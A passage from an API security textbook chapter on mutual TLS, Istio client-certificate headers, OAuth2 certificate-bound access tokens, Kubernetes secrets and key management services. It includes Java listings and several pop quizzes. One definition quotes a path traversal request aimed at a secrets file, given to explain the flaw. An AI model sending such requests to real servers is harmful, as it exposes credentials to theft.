service mesh proxies. Whenever an API request is made between a client and a server
within the service mesh, that request is transparently upgraded to mutual TLS by the
Pop quiz
7
Which one of the following headers is used by the NGINX ingress controller to
indicate whether client certificate authentication was successful?
a
ssl-client-cert
b
ssl-client-verify
c
ssl-client-issuer-dn
d
ssl-client-subject-dn
e
ssl-client-naughty-or-nice
The answer is at the end of the chapter.
Use the --key option to
specify the private key.
Supply the certificate
with --cert.
407
Mutual TLS authentication
proxies and both ends authenticate to each other with TLS certificates. This raises the
possibility of using the service mesh to authenticate service clients to the API itself.
For this to work, the service mesh proxy would need to forward the client certificate
details from the sidecar proxy to the underlying service as a HTTP header, just like
you’ve configured the ingress controller to do. Istio supports this by default since the
1.1.0 release, using the X-Forwarded-Client-Cert header, but Linkerd currently
doesn’t have this feature.
Unlike NGINX, which uses separate headers for different fields extracted from
the client certificate, Istio combines the fields into a single header like the following
example:4
x-forwarded-client-cert: By=http://frontend.lyft.com;Hash=
➥ 468ed33be74eee6556d90c0149c1309e9ba61d6425303443c0748a
➥ 02dd8de688;Subject="CN=Test Client,OU=Lyft,L=San
➥ Francisco,ST=CA,C=US"
The fields for a single certificate are separated by semicolons, as in the example. The
valid fields are given in table 11.3.
The behavior of Istio when setting this header is not configurable and depends on the
version of Istio being used. The latest version sets the By, Hash, Subject, URI, and DNS
fields when they are present in the client certificate used by the Istio sidecar proxy for
mTLS. Istio’s own certificates use a URI SAN entry to identify clients and servers,
using a standard called SPIFFE (Secure Production Identity Framework for Everyone),
which provides a way to name services in microservices environments. Figure 11.6
shows the components of a SPIFFE identifier, which consists of a trust domain and a
4 The Istio sidecar proxy is based on Envoy, which is developed by Lyft, in case you’re wondering about the
examples!
Table 11.3
Istio X-Forwarded-Client-Cert fields
Field
Description
By
The URI of the proxy that is forwarding the client details.
Hash
A hex-encoded SHA-256 hash of the full client certificate.
Cert
The client certificate in URL-encoded PEM format.
Chain
The full client certificate chain, in URL-encoded PEM format.
Subject
The Subject DN field as a double-quoted string.
URI
Any URI-type SAN entries from the client certificate. This field may be repeated if
there are multiple entries.
DNS
Any DNS-type SAN entries. This field can be repeated if there’s more than one
matching SAN entry.
408
CHAPTER 11
Securing service-to-service APIs
path. In Istio, the workload identifier consists of the Kubernetes namespace and ser-
vice account. SPIFFE allows Kubernetes services to be given stable IDs that can be
included in a certificate without having to publish DNS entries for each one; Istio can
use its knowledge of Kubernetes metadata to ensure that the SPIFFE ID matches the
service a client is connecting to.
DEFINITION
SPIFFE stands for Secure Production Identity Framework for Everyone
and is a standard URI for identifying services and workloads running in a clus-
ter. See https://spiffe.io for more information.
NOTE
Istio identities are based on Kubernetes service accounts, which are dis-
tinct from services. By default, there is only a single service account in each
namespace, shared by all pods in that namespace. See http://mng.bz/yrJG
for instructions on how to create separate service accounts and associate them
with your pods.
Istio also has its own version of Kubernetes’ ingress controller, in the form of the Istio
Gateway. The gateway allows external traffic into the service mesh and can also be con-
figured to process egress traffic leaving the service mesh.5 The gateway can also be
configured to accept TLS client certificates from external clients, in which case it
will also set the X-Forwarded-Client-Cert header (and strip it from any incoming
requests). The gateway sets the same fields as the Istio sidecar proxies, but also sets
the Cert field with the full encoded certificate.
Because a request may pass through multiple Istio sidecar proxies as it is being pro-
cessed, there may be more than one client certificate involved. For example, an exter-
nal client might make a HTTPS request to the Istio Gateway using a client certificate,
and this request then gets forwarded to a microservice over Istio mTLS. In this case,
the Istio sidecar proxy’s certificate would overwrite the certificate presented by the
real client and the microservice would only ever see the identity of the gateway in
the X-Forwarded-Client-Cert header. To solve this problem, Istio sidecar proxies
don’t replace the header but instead append the new certificate details to the existing
header, separated by a comma. The microservice would then see a header with multi-
ple certificate details in it, as in the following example:
5 The Istio Gateway is not just a Kubernetes ingress controller. An Istio service mesh may involve only part of a
Kubernetes cluster, or may span multiple Kubernetes clusters, while a Kubernetes ingress controller always
deals with external traffic coming into a single cluster.
spiffe://k8s.example.com/ns/natter-api/sa/natter-db
Trust domain
Workload identifier
Namespace
Service account
Figure 11.6
A SPIFFE identifier
consists of a trust domain and
a workload identifier. In Istio, the
workload identifier is made up of
the namespace and service
account of the service.
409
Mutual TLS authentication
X-Forwarded-Client-Cert: By=https://gateway.example.org;
➥ Hash=0d352f0688d3a686e56a72852a217ae461a594ef22e54cb
➥ 551af5ca6d70951bc,By=spiffe://api.natter.local/ns/
➥ natter-api/sa/natter-api-service;Hash=b26f1f3a5408f7
➥ 61753f3c3136b472f35563e6dc32fefd1ef97d267c43bcfdd1
The original client certificate presented to the gateway is the first entry in the header,
and the certificate presented by the Istio sidecar proxy is the second. The gateway
itself will strip any existing header from incoming requests, so the append behavior is
only for internal sidecar proxies. The sidecar proxies also strip the header from new
outgoing requests that originate inside the service mesh. These features allow you to
use client certificate authentication in Istio without needing to generate or manage
your own certificates. Within the service mesh, this is entirely managed by Istio, while
external clients can be issued with certificates using an external CA.
11.4.5 Mutual TLS with OAuth2
OAuth2 can also support mTLS for client authentication through a new specification
(RFC 8705 https://tools.ietf.org/html/rfc8705), which also adds support for certifi-
cate-bound access tokens, discussed in section 11.4.6. When used for client authenti-
cation, there are two modes that can be used:
In self-signed certificate authentication, the client registers a certificate with the
AS that is signed by its own private key and not by a CA. The client authenti-
cates to the token endpoint with its client certificate and the AS checks that it
exactly matches the certificate stored on the client’s profile. To allow the certifi-
cate to be updated, the AS can retrieve the certificate as the x5c claim on a JWK
from a HTTPS URL registered for the client.
In the PKI (public key infrastructure) method, the AS establishes trust in the
client’s certificate through one or more trusted CA certificates. This allows the
client’s certificate to be issued and reissued independently without needing to
update the AS. The client identity is matched to the certificate either through
the Subject DN or SAN fields in the certificate.
Unlike JWT bearer authentication, there is no way to use mTLS to obtain an access
token for a service account, but a client can get an access token using the client cre-
dentials grant. For example, the following curl command can be used to obtain an
access token from an AS that supports mTLS client authentication:
curl -d 'grant_type=client_credentials&scope=create_space' \
-d 'client_id=test' \
--cert test-client.pem \
--key test-client-key.pem \
https://as.example.org/oauth2/access_token
The client_id parameter must be explicitly specified when using mTLS client authen-
tication, so that the AS can determine the valid certificates for that client if using the
self-signed method.
The comma
separates the two
certificate entries.
Specify the
client_id
explicitly.
Authenticate using the client
certificate and private key.
410
CHAPTER 11
Securing service-to-service APIs
Alternatively, the client can use mTLS client authentication in combination with
the JWT Bearer grant type of section 11.3.2 to obtain an access token for a service
account while authenticating itself using the client certificate, as in the following curl
example, which assumes that the JWT assertion has already been created and signed
in the variable $JWT:
curl \
-d 'grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer' \
-d "assertion=$JWT&scope=a+b+c&client_id=test" \
--cert test-client.pem \
--key test-client-key.pem \
https://as.example.org/oauth2/access_token
The combination of mTLS and JWT bearer authentication is very powerful, as you’ll
see later in section 11.5.3.
11.4.6 Certificate-bound access tokens
Beyond supporting client authentication, the OAuth2 mTLS specification also describes
how the AS can optionally bind an access token the TLS client certificate when it is
issued, creating a certificate-bound access token. The access token then can be used to
access an API only when the client authenticates to the API using the same client cer-
tificate and private key. This makes the access token no longer a simple bearer token
because an attacker that steals the token can’t use it without the associated private key
(which never leaves the client).
DEFINITION
A certificate-bound access token can’t be used except over a TLS con-
nection that has been authenticated with the same client certificate used
when the access token was issued.
To obtain a certificate-bound access token, the client simply authenticates to the
token endpoint with the client certificate when obtaining an access token. If the AS
Proof-of-possession tokens
Certificate-bound access tokens are an example of proof-of-possession (PoP) tokens,
also known as holder-of-key tokens, in which the token can’t be used unless the client
proves possession of an associated secret key. OAuth 1 supported PoP tokens using
HMAC request signing, but the complexity of implementing this correctly was a factor
in the feature being dropped in the initial version of OAuth2. Several attempts have
been made to revive the idea, but so far, certificate-bound tokens are the only pro-
posal to have become a standard.
Although certificate-bound access tokens are great when you have a working PKI, they
can be difficult to deploy in some cases. They work poorly in single-page apps and
other web applications. Alternative PoP schemes are being discussed, such as a JWT-
based scheme known as DPoP (https://tools.ietf.org/html/draft-fett-oauth-dpop-03),
but these are yet to achieve widespread adoption.
Authorize using a JWT bearer
for the service account.
Authenticate the
client using mTLS.
411
Mutual TLS authentication
supports the feature, then it will associate a SHA-256 hash of the client certificate with
the access token. The API receiving an access token from a client can check for a cer-
tificate binding in one of two ways:
If using the token introspection endpoint (section 7.4.1 of chapter 7), the AS
will return a new field of the form "cnf": { "x5t#S256": "…hash…" } where the
hash is the Base64url-encoded certificate hash. The cnf claim communicates a
confirmation key, and the x5t#S256 part is the confirmation method being used.
If the token is a JWT, then the same information will be included in the JWT
claims set as a "cnf" claim with the same format.
DEFINITION
A confirmation key communicates to the API how it can verify a
constraint on who can use an access token. The client must confirm that it has
access to the corresponding private key using the indicated confirmation
method. For certificate-bound access tokens, the confirmation key is a SHA-256
hash of the client certificate and the client confirms possession of the private
key by authenticating TLS connections to the API with the same certificate.
Figure 11.7 shows the process by which an API enforces a certificate-bound access
token using token introspection. When the client accesses the API, it presents its
access token as normal. The API introspects the token by calling the AS token intro-
spection endpoint (chapter 7), which will return the cnf claim along with the other
token details. The API can then compare the hash value in this claim to the client cer-
tificate associated with the TLS session from the client.
In both cases, the API can check that the client has authenticated with the same
certificate by comparing the hash with the client certificate used to authenticate at the
TLS layer. Listing 11.9 shows how to calculate the hash of the certificate, known as a
thumbprint in the JOSE specifications, using the java.security.MessageDigest class
that you used in chapter 4. The hash should be calculated over the full binary encod-
ing of the certificate, which is what the certificate.getEncoded() method returns.
Open the OAuth2TokenStore.java file in your editor and add the thumbprint method
from the listing.
DEFINITION
A certificate thumbprint or fingerprint is a cryptographic hash of
the encoded bytes of the certificate.
private byte[] thumbprint(X509Certificate certificate) {
try {
var sha256 = MessageDigest.getInstance("SHA-256");
return sha256.digest(certificate.getEncoded());
} catch (Exception e) {
throw new RuntimeException(e);
}
}
Listing 11.9
Calculating a certificate thumbprint
Use a SHA-256
MessageDigest
instance.
Hash the bytes
of the entire
certificate.
412
CHAPTER 11
Securing service-to-service APIs
To enforce a certificate binding on an access token, you need to check the token
introspection response for a cnf field containing a confirmation key. The confirma-
tion key is a JSON object whose fields are the confirmation methods and the values
are the determined by each method. Loop through the required confirmation meth-
ods as shown in listing 11.9 to ensure that they are all satisfied. If any aren’t satisfied,
or your API doesn’t understand any of the confirmation methods, then you should
reject the request so that a client can’t access your API without all constraints being
respected.
TIP
The JWT specification for confirmation methods (RFC 7800, https://tools
.ietf.org/html/rfc7800) requires only a single confirmation method to be
specified. For robustness, you should check for other confirmation methods
and reject the request if there are any that your API doesn’t understand.
Listing 11.9 shows how to enforce a certificate-bound access token constraint by check-
ing for an x5t#S256 confirmation method. If a match is found, Base64url-decode the
AS
Client
API
1. Get cert-bound access token
2. Access API
3. Introspect token
{"cnf":
{"x5t#S256":"..."}}
The client obtains a certificatebound
access token from the AS.
The API introspects the
access token to discover
the certificate binding.
4. Check client cert matches
certificate binding
The API compares the certificate
binding to the certificate the client
has authenticated the connection with.
Figure 11.7
When a client obtains a certificate-bound access token and then uses it
to access an API, the API can discover the certificate binding using token introspection.
The introspection response will contain a "cnf" claim containing a hash of the client
certificate. The API can then compare the hash to the certificate the client has used to
authenticate the TLS connection to the API and reject the request if it is different.
413
Mutual TLS authentication
confirmation key value to obtain the expected hash of the client certificate. This can
then be compared against the hash of the actual certificate the client has used to
authenticate to the API. In this example, the API is running behind the NGINX ingress
controller, so the certificate is extracted from the ssl-client-cert header.
CAUTION
Remember to check the ssl-client-verify header to ensure
the certificate authentication succeeded; otherwise, you shouldn’t trust the
certificate.
If the client had directly connected to the Java API server, then the certificate is avail-
able through a request attribute:
var cert = (X509Certificate) request.attributes(
"javax.servlet.request.X509Certificate");
You can reuse the decodeCert method from the UserController to decode the certif-
icate from the header and then compare the hash from the confirmation key to the
certificate thumbprint using the MessageDigest.isEqual method. Open the OAuth2-
TokenStore.java file and update the processResponse method to enforce certificate-
bound access tokens as shown in the following listing.
private Optional<Token> processResponse(JSONObject response,
Request originalRequest) {
var expiry = Instant.ofEpochSecond(response.getLong("exp"));
var subject = response.getString("sub");
var confirmationKey = response.optJSONObject("cnf");
if (confirmationKey != null) {
for (var method : confirmationKey.keySet()) {
if (!"x5t#S256".equals(method)) {
throw new RuntimeException(
"Unknown confirmation method: " + method);
}
if (!"SUCCESS".equals(
originalRequest.headers("ssl-client-verify"))) {
return Optional.empty();
}
var expectedHash = Base64url.decode(
confirmationKey.getString(method));
var cert = UserController.decodeCert(
originalRequest.headers("ssl-client-cert"));
var certHash = thumbprint(cert);
if (!MessageDigest.isEqual(expectedHash, certHash)) {
return Optional.empty();
}
}
}
var token = new Token(expiry, subject);
Listing 11.10
Verifying a certificate-bound access token
Check if a
confirmation key
is associated
with the token.
Loop through the
confirmation
methods to
ensure all are
satisfied.
If there are any
unrecognized
confirmation
methods, then
reject the request.
Reject the request if
no valid certificate
is provided.
Extract the expected
hash from the
confirmation key.
Decode the client
certificate and
compare the hash,
rejecting if they
don’t match.
414
CHAPTER 11
Securing service-to-service APIs
token.attributes.put("scope", response.getString("scope"));
token.attributes.put("client_id",
response.optString("client_id"));
return Optional.of(token);
}
An important point to note is that an API can verify a certificate-bound access token
purely by comparing the hash values, and doesn’t need to validate certificate chains,
check basic constraints, or even parse the certificate at all!6 This is because the author-
ity to perform the API operation comes from the access token and the certificate is
being used only to prevent that token being stolen and used by a malicious client.
This significantly reduces the complexity of supporting client certificate authentica-
tion for API developers. Correctly validating an X.509 certificate is difficult and has
historically been a source of many vulnerabilities. You can disable CA verification at
the ingress controller by using the optional_no_ca option discussed in section 11.4.2,
because the security of certificate-bound access tokens depends only on the client
using the same certificate to access an API that it used when the token was issued,
regardless of who issued that certificate.
TIP
The client can even use a self-signed certificate that it generates just
before calling the token endpoint, eliminating the need for a CA for issuing
client certificates.
At the time of writing, only a few AS vendors support certificate-bound access tokens,
but it’s likely this will increase as the standard has been widely adopted in the financial
sector. Appendix A has instructions on installing an evaluation version of ForgeRock
Access Management 6.5.2, which supports the standard.
6 The code in listing 11.9 does parse the certificate as a side effect of decoding the header with a Certificate-
Factory, but you could avoid this if you wanted to.
Certificate-bound tokens and public clients
An interesting aspect of the OAuth2 mTLS specification is that a client can request
certificate-bound access tokens even if they don’t use mTLS for client authentication.
In fact, even a public client with no credentials at all can request certificate-bound
tokens! This can be very useful for upgrading the security of public clients. For exam-
ple, a mobile app is a public client because anybody who downloads the app could
decompile it and extract any credentials embedded in it. However, many mobile
phones now come with secure storage in the hardware of the phone. An app can gen-
erate a private key and self-signed certificate in this secure storage when it first
starts up and then present this certificate to the AS when it obtains an access token
to bind that token to its private key. The APIs that the mobile app then accesses with
the token can verify the certificate binding based purely on the hash associated with
the token, without the client needing to obtain a CA-signed certificate.
415
Managing service credentials
11.5
Managing service credentials
Whether you use client secrets, JWT bearer tokens, or TLS client certificates, the cli-
ent will need access to some credentials to authenticate to other services or to retrieve
an access token to use for service-to-service calls. In this section, you’ll learn how to
distribute credentials to clients securely. The process of distributing, rotating, and
revoking credentials for service clients is known as secrets management. Where the
secrets are cryptographic keys, then it is alternatively known as key management.
DEFINITION
Secrets management is the process of creating, distributing, rotat-
ing, and revoking credentials needed by services to access other services.
Key management refers to secrets management where the secrets are cryp-
tographic keys.
11.5.1 Kubernetes secrets
You’ve already used Kubernetes’ own secrets management mechanism in chapter 10,
known simply as secrets. Like other resources in Kubernetes, secrets have a name and
live in a namespace, alongside pods and services. Each named secret can have any num-
ber of named secret values. For example, you might have a secret for database creden-
tials containing a username and password as separate fields, as shown in listing 11.11.
Just like other resources in Kubernetes, they can be created from YAML configuration
files. The secret values are Base64-encoded, allowing arbitrary binary data to be
included. These values were created using the UNIX echo and Base64 commands:
echo -n 'dbuser' | base64
TIP
Remember to use the -n option to the echo command to avoid an extra
newline character being added to your secrets.
Pop quiz
8
Which of the following checks must an API perform to enforce a certificate-bound
access token? Choose all essential checks.
a
Check the certificate has not expired.
b
Ensure the certificate has not expired.
c
Check basic constraints in the certificate.
d
Check the certificate has not been revoked.
e
Verify that the certificate was issued by a trusted CA.
f
Compare the x5t#S256 confirmation key to the SHA-256 of the certificate the
client used when connecting.
9
True or False: A client can obtain certificate-bound access tokens only if it also
uses the certificate for client authentication.
The answers are at the end of the chapter.
416
CHAPTER 11
Securing service-to-service APIs
WARNING
Base64 encoding is not encryption. Don’t check secrets YAML files
directly into a source code repository or other location where they can be eas-
ily read.
apiVersion: v1
kind: Secret
metadata:
name: db-password
namespace: natter-api
type: Opaque
data:
username: ZGJ1c2Vy
password: c2VrcmV0
You can also define secrets at runtime using kubectl. Run the following command to
define a secret for the Natter API database username and password:
kubectl create secret generic db-password -n natter-api \
--from-literal=username=natter \
--from-literal=password=password
TIP
Kubernetes can also create secrets from files using the --from-file
=username.txt syntax. This avoids credentials being visible in the history of
your terminal shell. The secret will have a field named username.txt with the
binary contents of the file.
Kubernetes defines three types of secrets:
The most general are generic secrets, which are arbitrary sets of key-value pairs,
such as the username and password fields in listing 11.11 and in the previous
example. Kubernetes performs no special processing of these secrets and just
makes them available to your pods.
A TLS secret consists of a PEM-encoded certificate chain along with a private key.
You used a TLS secret in chapter 10 to provide the server certificate and key to
the Kubernetes ingress controller. Use kubectl create secret tls to create a
TLS secret.
A Docker registry secret is used to give Kubernetes credentials to access a private
Docker container registry. You’d use this if your organization stores all images
in a private registry rather than pushing them to a public registry like Docker
Hub. Use kubectl create secret docker-registry.
For your own application-specific secrets, you should use the generic secret type.
Once you’ve defined a secret, you can make it available to your pods in one of
two ways:
As files mounted in the filesystem inside your pods. For example, if you mounted
the secret defined in listing 11.11 under the path /etc/secrets/db, then you
Listing 11.11
Kubernetes secret example
The kind field indicates
this is a secret.
Give the secret a name
and a namespace.
The secret has two fields with
Base64-encoded values.
417
Managing service credentials
would end up with two files inside your pod: /etc/secrets/db/username and
/etc/secrets/db/password. Your application can then read these files to get
the secret values. The contents of the files will be the raw secret values, not the
Base64-encoded ones stored in the YAML.
As environment variables that are passed to your container processes when they
first run. In Java you can then access these through the System.getenv(String
name) method call.
TIP
File-based secrets should be preferred over environment variables. It’s
easy to read the environment of a running process using kubectl describe
pod, and you can’t use environment variables for binary data such as keys.
File-based secrets are also updated when the secret changes, while environ-
ment variables can only be changed by restarting the pod.
Listing 11.12 shows how to expose the Natter database username and password to the
pods in the Natter API deployment by updating the natter-api-deployment.yaml file. A
secret volume is defined in the volumes section of the pod spec, referencing the
named secret to be exposed. In a volumeMounts section for the individual container,
you can then mount the secret volume on a specific path in the filesystem. The new
lines are highlighted in bold.
apiVersion: apps/v1
kind: Deployment
metadata:
name: natter-api-deployment
namespace: natter-api
spec:
selector:
matchLabels:
app: natter-api
replicas: 1
template:
metadata:
labels:
app: natter-api
spec:
securityContext:
runAsNonRoot: true
containers:
- name: natter-api
image: apisecurityinaction/natter-api:latest
imagePullPolicy: Never
volumeMounts:
- name: db-password
mountPath: "/etc/secrets/database"
readOnly: true
securityContext:
allowPrivilegeEscalation: false
Listing 11.12
Exposing a secret to a pod
The volumeMount name must
match the volume name.
Specify a mount path
inside the container.
418
CHAPTER 11
Securing service-to-service APIs
readOnlyRootFilesystem: true
capabilities:
drop:
- all
ports:
- containerPort: 4567
volumes:
- name: db-password
secret:
secretName: db-password
You can now update the Main class to load the database username and password from
these secret files rather than hard coding them. Listing 11.13 shows the updated code
in the main method for initializing the database password from the mounted secret
files. You’ll need to import java.nio.file.* at the top of the file. Open the Main
.java file and update the method according to the listing. The new lines are high-
lighted in bold.
var secretsPath = Paths.get("/etc/secrets/database");
var dbUsername = Files.readString(secretsPath.resolve("username"));
var dbPassword = Files.readString(secretsPath.resolve("password"));
var jdbcUrl = "jdbc:h2:tcp://natter-database-service:9092/mem:natter";
var datasource = JdbcConnectionPool.create(
jdbcUrl, dbUsername, dbPassword);
createTables(datasource.getConnection());
You can rebuild the Docker image by running7
mvn clean compile jib:dockerBuild
then reload the deployment configuration to ensure the secret is mounted:
kubectl apply -f kubernetes/natter-api-deployment.yaml
Finally, you can restart Minikube to pick up the latest changes:
minikube stop && minikube start
Use kubectl get pods -n natter-api --watch to verify that all pods start up correctly
after the changes.
Listing 11.13
Loading Kubernetes secrets
7 Remember to run eval $(minikube docker-env) if this is a new terminal session.
The volumeMount name must
match the volume name.
Provide the name of
the secret to expose.
Load secrets
as files from
the filesystem.
Use the secret values to
initialize the JDBC connection.
419
Managing service credentials
SECURITY OF KUBERNETES SECRETS
Although Kubernetes secrets are easy to use and provide a level of separation between
sensitive credentials and other source code and configuration data, they have some
drawbacks from a security perspective:
Secrets are stored inside an internal database in Kubernetes, known as etcd. By
default, etcd is not encrypted, so anyone who gains access to the data storage
can read the values of all secrets. You can enable encryption by following the
instructions in http://mng.bz/awZz.
WARNING
The official Kubernetes documentation lists aescbc as the stron-
gest encryption method supported. This is an unauthenticated encryption
mode and potentially vulnerable to padding oracle attacks as you’ll recall
from chapter 6. You should use the kms encryption option if you can,
because all modes other than kms store the encryption key alongside the
encrypted data, providing only limited security. This was one of the find-
ings of the Kubernetes security audit conducted in 2019 (https://github
.com/trailofbits/audit-kubernetes).
Managing Kubernetes secrets
Although you can treat Kubernetes secrets like other configuration and store them in
your version control system, this is not a wise thing to do for several reasons:
Credentials should be kept secret and distributed to as few people as possi-
ble. Storing secrets in a source code repository makes them available to all
developers with access to that repository. Although encryption can help, it is
easy to get wrong, especially with complex command-line tools such as GPG.
Secrets should be different in each environment that the service is deployed
to; the database password should be different in a development environment
compared to your test or production environments. This is the opposite
requirement to source code, which should be identical (or close to it) between
environments.
There is almost no value in being able to view the history of secrets. Although
you may want to revert the most recent change to a credential if it causes an
outage, nobody ever needs to revert to the database password from two
years ago. If a mistake is made in the encryption of a secret that is hard to
change, such as an API key for a third-party service, it’s difficult to completely
delete the exposed value from a distributed version control system.
A better solution is to either manually manage secrets from the command line, or
else use a templating system to generate secrets specific to each environment.
Kubernetes supports a templating system called Kustomize, which can generate per-
environment secrets based on templates. This allows the template to be checked
into version control, but the actual secrets are added during a separate deployment
step. See http://mng.bz/Mov7 for more details.
420
CHAPTER 11
Securing service-to-service APIs
Anybody with the ability to create a pod in a namespace can use that to read the
contents of any secrets defined in that namespace. System administrators with
root access to nodes can retrieve all secrets from the Kubernetes API.
Secrets on disk may be vulnerable to exposure through path traversal or file expo-
sure vulnerabilities. For example, Ruby on Rails had a recent vulnerability in its
template system that allowed a remote attacker to view the contents of any file
by sending specially-crafted HTTP headers (https://nvd.nist.gov/vuln/detail/
CVE-2019-5418).
DEFINITION
A file exposure vulnerability occurs when an attacker can trick a
server into revealing the contents of files on disk that should not be accessible
externally. A path traversal vulnerability occurs when an attacker can send a
URL to a webserver that causes it to serve a file that was intended to be private.
For example, an attacker might ask for the file /public/../../../etc/secrets/db-
password. Such vulnerabilities can reveal Kubernetes secrets to attackers.
11.5.2 Key and secret management services
An alternative to Kubernetes secrets is to use a dedicated service to provide credentials
to your application. Secrets management services store credentials in an encrypted data-
base and make the available to services over HTTPS or a similar secure protocol. Typi-
cally, the client needs an initial credential to access the service, such as an API key or
client certificate, which can be made available via Kubernetes secrets or a similar
mechanism. All other secrets are then retrieved from the secrets management service.
Although this may sound no more secure than using Kubernetes secrets directly, it has
several advantages:
The storage of the secrets is encrypted by default, providing better protection
of secret data at rest.
The secret management service can automatically generate and update secrets
regularly. For example, Hashicorp Vault (https://www.vaultproject.io) can auto-
matically create short-lived database users on the fly, providing a temporary
username and password. After a configurable period, Vault will delete the
account again. This can be useful to allow daily administration tasks to run with-
out leaving a highly privileged account enabled at all times.
Fine-grained access controls can be applied, ensuring that services only have
access to the credentials they need.
All access to secrets can be logged, leaving an audit trail. This can help to estab-
lish what happened after a breach, and automated systems can analyze these
logs and alert if unusual access requests are noticed.
When the credentials being accessed are cryptographic keys, a Key Management Service
(KMS) can be used. A KMS, such as those provided by the main cloud providers,
securely stores cryptographic key material. Rather than exposing that key material
directly, a client of a KMS sends cryptographic operations to the KMS; for example,
421
Managing service credentials
requesting that a message is signed with a given key. This ensures that sensitive keys
are never directly exposed, and allows a security team to centralize cryptographic ser-
vices, ensuring that all applications use approved algorithms.
DEFINITION
A Key Management Service (KMS) stores keys on behalf of applica-
tions. Clients send requests to perform cryptographic operations to the KMS
rather than asking for the key material itself. This ensures that sensitive keys
never leave the KMS.
To reduce the overhead of calling a KMS to encrypt or decrypt large volumes of data,
a technique known as envelope encryption can be used. The application generates a ran-
dom AES key and uses that to encrypt the data locally. The local AES key is known as a
data encryption key (DEK). The DEK is then itself encrypted using the KMS. The
encrypted DEK can then be safely stored or transmitted alongside the encrypted data.
To decrypt, the recipient first decrypts the DEK using the KMS and then uses the DEK
to decrypt the rest of the data.
DEFINITION
In envelope encryption, an application encrypts data with a local
data encryption key (DEK). The DEK is then encrypted (or wrapped) with a key
encryption key (KEK) stored in a KMS or other secure service. The KEK itself
might be encrypted with another KEK creating a key hierarchy.
For both secrets management and KMS, the client usually interacts with the service
using a REST API. Currently, there is no common standard API supported by all pro-
viders. Some cloud providers allow access to a KMS using the standard PKCS#11 API
used by hardware security modules. You can access a PKCS#11 API in Java through the
Java Cryptography Architecture, as if it was a local keystore, as shown in listing 11.14.
(This listing is just to show the API; you don’t need to type it in.) Java exposes a
PKCS#11 device, including a remote one such as a KMS, as a KeyStore object with the
type "PKCS11".8 You can load the keystore by calling the load() method, providing a
null InputStream argument (because there is no local keystore file to open) and pass-
ing the KMS password or other credential as the second argument. After the PKCS#11
keystore has been loaded, you can then load keys and use them to initialize Signature
and Cipher objects just like any other local key. The difference is that the Key object
returned by the PKCS#11 keystore has no key material inside it. Instead, Java will auto-
matically forward cryptographic operations to the KMS via the PKCS#11 API.
TIP
Java’s built-in PKCS#11 cryptographic provider only supports a few algo-
rithms, many of which are old and no longer recommended. A KMS vendor
may offer their own provider with support for more algorithms.
8 If you’re using the IBM JDK, use the name “PKCS11IMPLKS” instead.
422
CHAPTER 11
Securing service-to-service APIs
var keyStore = KeyStore.getInstance("PKCS11");
var keyStorePassword = "changeit".toCharArray();
keyStore.load(null, keyStorePassword);
var signingKey = (PrivateKey) keyStore.getKey("rsa-key",
keyStorePassword);
var signature = Signature.getInstance("SHA256WithRSA");
signature.initSign(signingKey);
signature.update("Hello!".getBytes(UTF_8));
var sig = signature.sign();
A KMS can be used to encrypt credentials that are then distributed to services using
Kubernetes secrets. This provides better protection than the default Kubernetes con-
figuration and enables the KMS to be used to protect secrets that aren’t cryp-
tographic keys. For example, a database connection password can be encrypted with
the KMS and then the encrypted password is distributed to services as a Kubernetes
secret. The application can then use the KMS to decrypt the password after loading it
from the disk.
Listing 11.14
Accessing a KMS through PKCS#11
PKCS#11 and hardware security modules
PKCS#11, or Public Key Cryptography Standard 11, defines a standard API for inter-
acting with hardware security modules (HSMs). An HSM is a hardware device dedi-
cated to secure storage of cryptographic keys. HSMs range in size from tiny USB keys
that support just a few keys, to rack-mounted network HSMs that can handle thou-
sands of requests per second (and cost tens of thousands of dollars). Just like a KMS,
the key material can’t normally be accessed directly by clients and they instead send
cryptographic requests to the device after logging in. The API defined by PKCS#11,
known as Cryptoki, provides operations in the C programming language for logging
into the HSM, listing available keys, and performing cryptographic operations.
Unlike a purely software KMS, an HSM is designed to offer protection against an
attacker with physical access to the device. For example, the circuitry of the HSM may
be encased in tough resin with embedded sensors that can detect anybody trying to
tamper with the device, in which case the secure memory is wiped to prevent com-
promise. The US and Canadian governments certify the physical security of HSMs
under the FIPS 140-2 certification program, which offers four levels of security: level
1 certified devices offer only basic protection of key material, while level 4 offers pro-
tection against a wide range of physical and environmental threats. On the other
hand, FIPS 140-2 offers very little validation of the quality of implementation of the
algorithms running on the device, and some HSMs have been found to have serious
software security flaws. Some cloud KMS providers can be configured to use FIPS
140-2 certified HSMs for storage of keys, usually at an increased cost. However,
most such services are already running in physically secured data centers, so the
additional physical protection is usually unnecessary.
Load the PKCS11 keystore
with the correct password.
Retrieve a key object
from the keystore.
Use the key to
sign a message.
423
Managing service credentials
11.5.3 Avoiding long-lived secrets on disk
Although a KMS or secrets manager can be used to protect secrets against theft, the
service will need an initial credential to access the KMS itself. While cloud KMS pro-
viders often supply an SDK that transparently handles this for you, in many cases the
SDK is just reading its credentials from a file on the filesystem or from another source
in the environment that the SDK is running in. There is therefore still a risk that an
attacker could compromise these credentials and then use the KMS to decrypt the
other secrets.
TIP
You can often restrict a KMS to only allow your keys to be used from cli-
ents connecting from a virtual private cloud (VPC) that you control. This
makes it harder for an attacker to use compromised credentials because they
can’t directly connect to the KMS over the internet.
A solution to this problem is to use short-lived tokens to grant access to the KMS or
secrets manager. Rather than deploying a username and password or other static cre-
dential using Kubernetes secrets, you can instead generate a temporary credential
with a short expiry time. The application uses this credential to access the KMS or
secrets manager at startup and decrypt the other secrets it needs to operate. If an
attacker later compromises the initial token, it will have expired and can’t be used.
For example, Hashicorp Vault (https://vaultproject.io) supports generating tokens
with a limited expiry time which a client can then use to retrieve other secrets from
the vault.
Pop quiz
10 Which of the following are ways that a Kubernetes secret can be exposed to
pods?
a
As files
b
As sockets
c
As named pipes
d
As environment variables
e
As shared memory buffers
11 What is the name of the standard that defines an API for talking to hardware
security modules?
a
PKCS#1
b
PKCS#7
c
PKCE
d
PKCS#11
e
PKCS#12
The answers are at the end of the chapter.
424
CHAPTER 11
Securing service-to-service APIs
CAUTION
The techniques in this section are significantly more complex than
other solutions. You should carefully weigh the increased security against
your threat model before adopting these approaches.
If you primarily use OAuth2 for access to other services, you can deploy a short-lived
JWT that the service can use to obtain access tokens using the JWT bearer grant
described in section 11.3. Rather than giving clients direct access to the private key to
create their own JWTs, a separate controller process generates JWTs on their behalf
and distributes these short-lived bearer tokens to the pods that need them. The client
then uses the JWT bearer grant type to exchange the JWT for a longer-lived access
token (and optionally a refresh token too). In this way, the JWT bearer grant type can
